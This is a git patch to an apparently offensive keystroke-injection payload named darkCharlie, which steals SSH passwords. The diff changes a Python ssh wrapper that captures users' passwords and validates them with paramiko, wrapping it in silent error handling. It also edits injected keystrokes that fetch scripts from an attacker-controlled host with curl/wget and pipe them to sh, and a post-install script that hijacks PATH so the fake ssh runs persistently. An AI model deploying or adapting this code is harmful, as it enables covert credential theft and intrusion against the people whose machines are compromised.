From 99e6b63f4215a55c56db175df287874382805bb5 Mon Sep 17 00:00:00 2001
From: Michael Weinstein
Date: Thu, 21 Sep 2017 01:34:02 -0700
Subject: [PATCH] Testing bug fixes

Windows line endings removed. Grrrr. WTF, microsoft? Found and fixed bug caused by missing default ssh config files making the program index into a NoneType by checking to make sure there's data there before indexing in. Added the blanket try/except block for silent failures. Main cause of these appears to be very badly written (invalid) ssh commands. This is probably the best behavior the program could have with these... just silently run them and let them fail normally. Do not pass go, do not collect 200 passwords.
---
 .../darkCharlie/injector/darkCharlie.py | 19 +++++++++-------
 .../darkCharlie/injector/payload.txt | 22 ++++++++++++++++---
 .../credentials/darkCharlie/injector/post.sh | 5 +++--
 .../credentials/darkCharlie/injector/pre.sh | 2 +-
 4 files changed, 34 insertions(+), 14 deletions(-)

diff --git a/payloads/library/credentials/darkCharlie/injector/darkCharlie.py b/payloads/library/credentials/darkCharlie/injector/darkCharlie.py
index 7ea76f48..225b5dcc 100644
--- a/payloads/library/credentials/darkCharlie/injector/darkCharlie.py
+++ b/payloads/library/credentials/darkCharlie/injector/darkCharlie.py
@@ -322,7 +322,7 @@ def parseArguments():
 def findHostInLootConfigs(lootFileData, host):
     for fileHash in lootFileData["configFiles"]:
-        if host in lootFileData["configFiles"][fileHash]:
+        if lootFileData["configFiles"][fileHash] and host in lootFileData["configFiles"][fileHash]: #have to check if there is even file data there, otherwise we end up indexing into nothing and failing hard
             return lootFileData["configFiles"][fileHash][host]
     return None
@@ -391,7 +391,7 @@ def shinyLetsBeBadGuys():
         try:
             password = lowDownDirtyDeceiver(userName, hostAddress)
         except:
-            password = FailedToObtain
+            password = "FailedToObtain"
             break
         try:
             gotValidPass = paramikoApprovesOfThisPassword(hostAddress, hostPort, userName, password)
@@ -402,11 +402,14 @@ def shinyLetsBeBadGuys():
 if __name__ == '__main__':
     import os
-    args = parseArguments()
-    intendedCommand = args[:]
-    intendedCommand[0] = originalSSHExecutable
-    intendedCommand = " ".join(intendedCommand)
-    if len(args) > 1:
-        shinyLetsBeBadGuys()
+    try:
+        args = parseArguments()
+        intendedCommand = args[:]
+        intendedCommand[0] = originalSSHExecutable
+        intendedCommand = " ".join(intendedCommand)
+        if len(args) > 1:
+            shinyLetsBeBadGuys()
+    except: #I really feel weird doing a massive open-ended exception here... but silence
+        pass
     os.system(intendedCommand)
     quit()
\ No newline at end of file
diff --git a/payloads/library/credentials/darkCharlie/injector/payload.txt b/payloads/library/credentials/darkCharlie/injector/payload.txt
index a59c6d07..3da8b92b 100644
--- a/payloads/library/credentials/darkCharlie/injector/payload.txt
+++ b/payloads/library/credentials/darkCharlie/injector/payload.txt
@@ -60,20 +60,36 @@ QUACK DELAY 2000
 if [ "$mac" = true ]
 then
 QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh
+QUACK ENTER
+QUACK DELAY 200
 QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh
+QUACK ENTER
+QUACK DELAY 200
 QUACK STRING curl "http://$HOST_IP/post.sh" \| sh
+QUACK ENTER
+QUACK DELAY 200
 QUACK STRING ~/.config/ssh/ssh --initializeScript
+QUACK ENTER
+QUACK DELAY 200
 else
 QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT
-QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh #Will test this on a mac when I finish up
+QUACK ENTER
+QUACK DELAY 200
+QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> "~/.config/ssh/ssh" #Will test this on a mac when I finish up
+QUACK ENTER
+QUACK DELAY 200
 QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh
-QUACK STRING ~/.config/ssh/ssh --initializeScript
+QUACK ENTER
+QUACK DELAY 200
+QUACK STRING python "~/.config/ssh/ssh" --initializeScript
+QUACK ENTER
+QUACK DELAY 200
 fi
 QUACK DELAY 200
 QUACK ENTER
 QUACK DELAY 200
-QUACK STRING exit
+#QUACK STRING exit
 QUACK DELAY 200
 QUACK ENTER
 LED SUCCESS #The Dungeons and Dragons tattoo hath rolled a 20
diff --git a/payloads/library/credentials/darkCharlie/injector/post.sh b/payloads/library/credentials/darkCharlie/injector/post.sh
index bff63547..ab7f2980 100644
--- a/payloads/library/credentials/darkCharlie/injector/post.sh
+++ b/payloads/library/credentials/darkCharlie/injector/post.sh
@@ -1,9 +1,10 @@
 #!/bin/bash
-chmod u+x ~/.config/sudo/sudo
+chmod u+x ~/.config/ssh/ssh
 if [ -f ~/.bash_profile ]
 then
 echo "export PATH=~/.config/ssh:$PATH" >> ~/.bash_profile
 else
 echo "export PATH=~/.config/ssh:$PATH" >> ~/.bashrc
-fi
\ No newline at end of file
+fi
+
diff --git a/payloads/library/credentials/darkCharlie/injector/pre.sh b/payloads/library/credentials/darkCharlie/injector/pre.sh
index 06431c18..27e9a96e 100644
--- a/payloads/library/credentials/darkCharlie/injector/pre.sh
+++ b/payloads/library/credentials/darkCharlie/injector/pre.sh
@@ -8,4 +8,4 @@ fi
 if [ -f ~/.config/ssh/ssh ]
 then
 rm ~/.config/ssh/ssh
-fi
\ No newline at end of file
+fi